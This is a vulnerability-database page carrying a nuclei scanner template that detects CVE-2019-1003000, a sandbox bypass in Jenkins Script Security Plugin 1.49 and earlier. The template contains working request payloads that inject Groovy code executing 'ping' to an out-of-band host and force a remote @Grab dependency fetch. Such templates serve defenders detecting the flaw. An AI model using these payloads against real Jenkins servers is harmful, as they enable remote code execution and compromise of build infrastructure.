Lucene search
K

Jenkins Script Security Plugin <=1.49 - Sandbox Bypass

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 152 Views

Jenkins Script Security Plugin <=1.49 vulnerability allows sandbox bypass leading to potential compromise of entire environment

Related
Refs
Code
id: CVE-2019-1003000

info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
  impact: |
    Attackers with permission to submit sandboxed scripts can bypass sandbox protections and execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment and all managed systems.
  remediation: |
    Upgrade to Jenkins Script Security Plugin version 1.50 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-1003000
    epss-score: 0.98428
    epss-percentile: 0.99912
    cpe: cpe:2.3:a:jenkins:script_security:*:*:*:*:*:jenkins:*:*
  reference:
    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  metadata:
    verified: true
    max-request: 6
    vendor: jenkins
    product: script_security
  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev,vuln

variables:
  username: admin
  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
  app_name: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && (http(3) || http(4))

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "jenkins"
        internal: true
        case-insensitive: true

  - raw:
      - |
        POST /j_acegi_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
        internal: true

  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 490a0046304402207e6c4868cadc010f9886c3658d32881a4ca2093fc3a5615d64d7affcd07640e102207d5e234baf64039c939dae07a4359206b32aa1e45cddedea1242450e037e94f2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.5
CVSS 3.18.8
EPSS0.98428
152